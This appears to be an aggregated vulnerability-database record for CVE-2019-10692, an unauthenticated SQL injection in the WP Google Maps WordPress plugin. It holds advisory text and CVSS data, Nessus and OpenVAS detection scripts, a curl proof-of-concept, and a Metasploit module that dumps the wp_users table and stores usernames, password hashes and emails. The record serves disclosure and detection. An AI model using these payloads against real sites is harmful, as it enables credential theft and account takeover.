ID WPEX-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEAType wpexploitReporter wpvulndbModified 2020-11-19T06:03:54
Description
The includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement, leading to an unauthenticated SQL injection issue.
curl -k --silent "http://example.com/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=fields=3D*+from+wp_users+--+-"
{"id": "WPEX-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEA", "type": "wpexploit", "bulletinFamily": "exploit", "title": "WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection", "description": "The includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement, leading to an unauthenticated SQL injection issue.\n", "published": "2019-04-02T00:00:00", "modified": "2020-11-19T06:03:54", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "wpvulndb", "references": ["https://plugins.trac.wordpress.org/changeset/2061434/wp-google-maps/trunk/includes/class.rest-api.php", "https://packetstormsecurity.com/files/159640/", "https://vulners.com/exploitdb/EDB-ID:48918"], "cvelist": ["CVE-2019-10692"], "lastseen": "2021-02-15T22:32:04", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:709DAE2D-2952-4B3C-83D8-7E94508429A2"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0801"]}, {"type": "cve", "idList": ["CVE-2019-10692"]}, {"type": "exploitdb", "idList": ["EDB-ID:48918"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/WP_GOOGLE_MAPS_SQLI"]}, {"type": "nessus", "idList": ["WORDPRESS_WP_GOOGLE_MAPS_7_11_17_SQLI.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142238"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159640"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEA"]}], "rev": 4}, "score": {"value": 6.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:709DAE2D-2952-4B3C-83D8-7E94508429A2"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0801"]}, {"type": "cve", "idList": ["CVE-2019-10692"]}, {"type": "exploitdb", "idList": ["EDB-ID:48918"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/WP_GOOGLE_MAPS_SQLI"]}, {"type": "nessus", "idList": ["WORDPRESS_WP_GOOGLE_MAPS_7_11_17_SQLI.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142238"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159640"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEA"]}]}, "exploitation": null, "vulnersScore": 6.5}, "sourceData": "curl -k --silent \"http://example.com/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=fields=3D*+from+wp_users+--+-\"", "generation": 1, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646193581}}
{"checkpoint_advisories": [{"lastseen": "2022-05-03T17:56:01", "description": "An SQL injection vulnerability exists in the WordPress Google Maps Plugin. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-01T00:00:00", "type": "checkpoint_advisories", "title": "WordPress Google Maps Plugin SQL Injection (CVE-2019-10692)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10692"], "modified": "2019-07-01T00:00:00", "id": "CPAI-2019-0801", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-10-20T20:39:06", "description": "", "published": "2020-10-20T00:00:00", "type": "packetstorm", "title": "WordPress Rest Google Maps SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10692"], "modified": "2020-10-20T00:00:00", "id": "PACKETSTORM:159640", "href": "https://packetstormsecurity.com/files/159640/WordPress-Rest-Google-Maps-SQL-Injection.html", "sourceData": "`# Exploit Title: WordPress Rest Google Maps Plugin SQL Injection \n# Google Dork: inurl:index.php?rest_route=3D/wpgmza/ \n# Date: 2020-09-09 \n# Exploit Author: Jonatas Fil \n# Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers \n# Software Link: https://wordpress.org/plugins/wp-google-maps/ \n# Version: < 7.11.18 \n# Tested on: Linux \n# CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2019-10692) \n#!/bin/bash \n \nTARGET=\"192.168.1.77\" \n \ncurl -k --silent \n\"http://$TARGET/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&= \nfields=3D*+from+wp_users+--+-\" \n| jq \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/159640/wprestgooglemaps-sql.txt"}], "attackerkb": [{"lastseen": "2021-07-20T20:17:44", "description": "In the wp-google-maps plugin before 7.11.18 for WordPress, includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement.\n\n \n**Recent assessments:** \n \n**rootOptional** at March 09, 2020 9:03pm UTC reported:\n\nThis CVE is fairly obscure due to it being present in the WordPress plugin google-maps in versions between 7.11.00 and 7.11.17.\n\nThe way this is exploited is the plugin does not sanitise field names before a select statement. This results in it being vulnerable to sql injection. This can be exploited to dump credentials and password hashes for users within the database resulting in potential account takeover if these hashes aren\u2019t hashed correctly or if they use weak passwords.\n\nFor this, the plugin also needs to be out of date as it is easily patched by upgrading the plugin to the latest version. However, it isn\u2019t uncommon to find outdated plugins within WordPress sites. There is also a Metasploit module designed to automate the exploitation process\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-02T00:00:00", "type": "attackerkb", "title": "CVE-2019-10692", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10692"], "modified": "2020-07-30T00:00:00", "id": "AKB:709DAE2D-2952-4B3C-83D8-7E94508429A2", "href": "https://attackerkb.com/topics/IOu7SJQvG9/cve-2019-10692", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-10-18T12:19:17", "description": "The WP Google Maps plugin for WordPress running on the remote web server is affected by an SQL injection (SQLi) vulnerability due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-03T00:00:00", "type": "nessus", "title": "WP Google Maps for WordPress < 7.11.17 Unauthenticated SQL Injection (CVE-2019-10692)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10692"], "modified": "2019-10-30T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_WP_GOOGLE_MAPS_7_11_17_SQLI.NASL", "href": "https://www.tenable.com/plugins/nessus/123643", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123643);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/10/30 13:24:46\");\n\n script_cve_id(\"CVE-2019-10692\");\n\n script_name(english:\"WP Google Maps for WordPress < 7.11.17 Unauthenticated SQL Injection (CVE-2019-10692)\");\n script_summary(english:\"Checks for vulnerability.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running a PHP application that is affected\nby an unauthenticated SQL injection vulnerability.\");\n\n script_set_attribute(attribute:\"description\", value:\n\"The WP Google Maps plugin for WordPress running on the remote web\nserver is affected by an SQL injection (SQLi) vulnerability due to\nimproper validation of user-supplied input. An unauthenticated,\nremote attacker can exploit this to inject or manipulate SQL queries\nin the back-end database, resulting in the disclosure or manipulation\nof arbitrary data.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wpvulndb.com/vulnerabilities/9249\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/plugins/wp-google-maps/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the WP Google Maps plugin for WordPress to version\n7.11.18 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10692\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"data_protection.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(app_name:app, port:port);\n\ndir = install[\"path\"];\ninstall_url = build_url(port:port, qs:dir);\n\nurl = install_url + '/index.php?rest_route=/wpgmza/v1/markers/&filter=%7B%22nessus%22%3Atrue%7D&fields=user%28%29%20as%20user%5Fhostname%2Cversion%28%29%20as%20mysql%5Fversion%2Csysdate%28%29%20as%20nessus%5Fwas%5Fhere';\n\nplugin_name = \"WP Google Maps\";\n\nres = http_send_recv3(\n method:\"GET\",\n port:port,\n item:url,\n exit_on_fail:TRUE\n);\n\noutput = data_protection::sanitize_user_full_redaction(output:res[2]);\n\nif (\"nessus_was_here\" >< res[2])\n{\n security_report_v4(\n port:port,\n severity:SECURITY_HOLE,\n request:make_list(http_last_sent_request()),\n output:output,\n generic:TRUE,\n sqli:TRUE\n );\n}\nelse audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin_name + ' plugin');\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:32:04", "bulletinFamily": "software", "cvelist": ["CVE-2019-10692"], "description": "The includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement, leading to an unauthenticated SQL injection issue.\n\n### PoC\n\ncurl -k --silent \"http://example.com/index.php?rest_route=3D/wpgmza/v1/markers/&filter;=3D%7B%7D&=fields=3D*+from+wp_users+--+-\"\n", "modified": "2020-11-19T06:03:54", "published": "2019-04-02T00:00:00", "id": "WPVDB-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEA", "href": "https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea", "type": "wpvulndb", "title": "WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-12T07:24:50", "description": "This module exploits a SQL injection vulnerability in a REST endpoint registered by the WordPress plugin wp-google-maps between 7.11.00 and 7.11.17 (included). As the table prefix can be changed by administrators, set DB_PREFIX accordingly.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-11T12:04:57", "type": "metasploit", "title": "WordPress Google Maps Plugin SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10692"], "modified": "2019-04-15T12:06:27", "id": "MSF:AUXILIARY/ADMIN/HTTP/WP_GOOGLE_MAPS_SQLI", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Wordpress\n\n def initialize(info = {})\n super(\n 'Name' => 'WordPress Google Maps Plugin SQL Injection',\n 'Description' => %q{\n This module exploits a SQL injection vulnerability in a REST endpoint\n registered by the WordPress plugin wp-google-maps between 7.11.00 and\n 7.11.17 (included).\n\n As the table prefix can be changed by administrators, set DB_PREFIX\n accordingly.\n },\n 'Author' =>\n [\n 'Thomas Chauchefoin (Synacktiv)', # Vulnerability discovery, Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2019-10692'],\n ['WPVDB', '9249']\n ],\n 'DisclosureDate' => '2019-04-02'\n )\n\n register_options(\n [\n OptString.new('DB_PREFIX', [true, 'WordPress table prefix', 'wp_'])\n ])\n end\n\n def send_sql_request(sql_query)\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => {\n 'rest_route' => '/wpgmza/v1/markers',\n 'filter' => '{}',\n 'fields' => \"#{sql_query}-- -\",\n }\n )\n\n return nil if res.nil? || res.code != 200 || res.body.nil?\n res.body\n end\n\n def check\n mynum = \"#{Rex::Text.rand_text_numeric(8..20)}\"\n body = send_sql_request(mynum)\n return Exploit::CheckCode::Unknown if body.nil?\n return Exploit::CheckCode::Vulnerable if body.include?(mynum)\n\n Exploit::CheckCode::Unknown\n end\n\n def run\n print_status(\"#{peer} - Trying to retrieve the #{datastore['DB_PREFIX']}users table...\")\n\n body = send_sql_request(\"* from #{datastore['DB_PREFIX']}users\")\n fail_with(Failure::UnexpectedReply, 'No response or unexpected status code in response') if body.nil?\n\n begin\n body = JSON.parse(body)\n rescue JSON::ParserError\n fail_with(Failure::NotFound, 'Returned data is not in JSON format')\n end\n\n if body.empty?\n print_error(\"#{peer} - Failed to retrieve the table #{datastore['DB_PREFIX']}users\")\n else\n loot = store_loot(\"wp_google_maps.json\",\"application/json\", rhost, body.to_s)\n print_good(\"Credentials saved in: #{loot}\")\n end\n\n body.each do |user|\n print_good(\"#{peer} - Found #{user['user_login']} #{user['user_pass']} #{user['user_email']}\")\n connection_details = {\n module_fullname: self.fullname,\n username: user['user_login'],\n private_data: user['user_pass'],\n private_type: :nonreplayable_hash,\n workspace_id: myworkspace_id,\n status: Metasploit::Model::Login::Status::UNTRIED,\n proof: user['user_email']\n }.merge(service_details)\n create_credential(connection_details)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/wp_google_maps_sqli.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:44:28", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-20T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10692"], "modified": "2020-10-20T00:00:00", "id": "EDB-ID:48918", "href": "https://www.exploit-db.com/exploits/48918", "sourceData": "# Exploit Title: WordPress Rest Google Maps Plugin SQL Injection\r\n# Google Dork: inurl:index.php?rest_route=3D/wpgmza/\r\n# Date: 2020-09-09\r\n# Exploit Author: Jonatas Fil\r\n# Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers\r\n# Software Link: https://wordpress.org/plugins/wp-google-maps/\r\n# Version: < 7.11.18\r\n# Tested on: Linux\r\n# CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2019-10692)\r\n#!/bin/bash\r\n\r\nTARGET=\"192.168.1.77\"\r\n\r\ncurl -k --silent\r\n\"http://$TARGET/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=\r\nfields=3D*+from+wp_users+--+-\"\r\n| jq", "sourceHref": "https://www.exploit-db.com/download/48918", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:32:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10692"], "description": "WordPress WP Google Maps plugin is prone to an unauthenticated SQL injection\n vulnerability.", "modified": "2019-04-10T00:00:00", "published": "2019-04-10T00:00:00", "id": "OPENVAS:1361412562310142238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142238", "type": "openvas", "title": "WordPress WP Google Maps Plugin < 7.11.18 SQL Injection Vulnerability", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142238\");\n script_version(\"2019-04-10T13:08:52+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-10 13:08:52 +0000 (Wed, 10 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-10 11:55:03 +0000 (Wed, 10 Apr 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-10692\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"WordPress WP Google Maps Plugin < 7.11.18 SQL Injection Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n\n script_tag(name:\"summary\", value:\"WordPress WP Google Maps plugin is prone to an unauthenticated SQL injection\n vulnerability.\");\n\n script_tag(name:\"insight\", value:\"The file includes/class.rest-api.php in the REST API does not sanitize field\n names before a SELECT statement which may lead to a SQL injection vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP GET request and checks the response.\");\n\n script_tag(name:\"affected\", value:\"WordPress WP Google Maps plugin before version 7.11.18.\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.11.18 or later.\");\n\n script_xref(name:\"URL\", value:\"https://wordpress.org/plugins/wp-google-maps/#developers\");\n script_xref(name:\"URL\", value:\"https://github.com/rapid7/metasploit-framework/pull/11698\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nvt_strings = get_vt_strings();\n# '-' causes trouble in the injection\nvt_str = str_replace(string: vt_strings['default'], find: \"-\", replace: \"_\");\nrand = rand_str(length: 4, charset: \"01234456789\");\nmarker = vt_str + \"_\" + rand;\n\nurl = \"/index.php?rest_route=/wpgmza/v1/markers/&filter=%7B%22%22%3Atrue%7D\" +\n \"&fields=user%28%29%20as%20\" + vt_str + \"%5F\" + rand;\n\nreq = http_get(port: port, item: url);\nres = http_keepalive_send_recv(port: port, data: req);\n\nif (res =~ \"^HTTP/1\\.[01] 200\" && marker >< res) {\n report = 'It was possible to inject the function user() in the SQL statement.\\n\\nResponse:\\n\\n' +\n res;\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-05-03T17:08:26", "description": "In the wp-google-maps plugin before 7.11.18 for WordPress, includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-02T18:30:00", "type": "cve", "title": "CVE-2019-10692", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10692"], "modified": "2022-05-03T14:49:00", "cpe": [], "id": "CVE-2019-10692", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-10692", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}]}
